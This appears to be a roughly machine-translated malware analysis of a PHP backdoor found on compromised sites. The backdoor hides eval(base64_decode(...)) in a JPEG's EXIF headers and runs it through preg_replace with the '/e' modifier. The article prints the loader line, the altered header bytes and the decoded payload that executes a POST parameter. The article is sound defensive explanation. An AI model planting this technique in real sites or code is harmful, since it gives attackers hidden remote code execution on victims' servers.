PHP Pictures Trojan Explanation

Source: Internet
Author: User

This is a very interesting backdoor, it does not rely on the normal mode to hide the content (such as Base64/gzip encoding), but it has its own data hidden in the image of the EXIF head of JPEG. It also uses Exif_read_data and preg_replace two PHP functions to read EXIF headers and execute.


The back door can be divided into two parts. The first part is the Exif_read_data function to read the picture header, Preg_replace function to execute the content. Here is the code we found on the compromised site:

$exif = exif_read_data(‘/homepages/clientsitepath/images/stories/food/bun.jpg‘);preg_replace($exif[‘Make‘],$exif[‘Model‘],‘‘);

The two functions themselves are harmless drops. The Exif_read_data function is commonly used to read pictures, and the Preg_replace function is substituted for character content. However, the Preg_replace function function has a hidden and subtle option, and if you pass in "/E", it executes the contents of eval (), not the query/substitution.

So when we look at the bun.jpg file, we find the second part of the Backdoor:

ÿøÿà^@^pjfif^@^a^b^@^@d^@d^@^@ÿá^@¡exif^@^@II*^@^h^@^@^@^b^@ ^O^ a^b^@^f^@^@^@&^@^@^@^p^a^b^@m^@^< span class= "variable" >@^@,^@^@^@^@^@^@^ @/. */e^@ eval (base64_decode ( "Awygkgl Zc2v0kcrfue9tvfsie noxil0pksb7zxzhbchzdhjpchnsyxnozxmojf9qt1nuwyj6ejeixskpo30= ')); @ÿì^@^qducky^@^a^@ ^d^@^@^@<^@^< span class= "variable" >@ÿî^@^nadobe^         

This file is used for common Head Start, but the "make" header is mixed with the strange keyword "/.*/e". With this execution modifier, Preg_replace executes any incoming content in eval ().

Things are starting to get interesting ...

If we continue to look at EXIF data, we can see that "eval" (Base64_decode) is hidden in the "Model" header. Put these together and we'll see what's going on. The attacker reads the make and Model header information from the EXIF and then passes in to the Preg_replace function. As long as we modify the $exif [' make '] and $exif [' Model '], we get the final backdoor.

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

After decoding we can see that it is executing the content provided by $_post["ZZ1". After the full decoding, here is the back.

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

Another interesting thing is that although bun.jpg and other picture files have been modified, they can then be loaded and working properly. In fact, at these compromised sites, an attacker modifies a legitimate, previously existing image on the site. This is a strange way to hide malware.


Call to undefined function exif_read_data ()

Read the picture EXIF Information program is reported: Call to undefined function exif_read_data ()

Find a solution:

Extension=php_exif.dll to change its load order to

After Extension=php_mbstring.dll ....

PHP Pictures Trojan Explanation

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.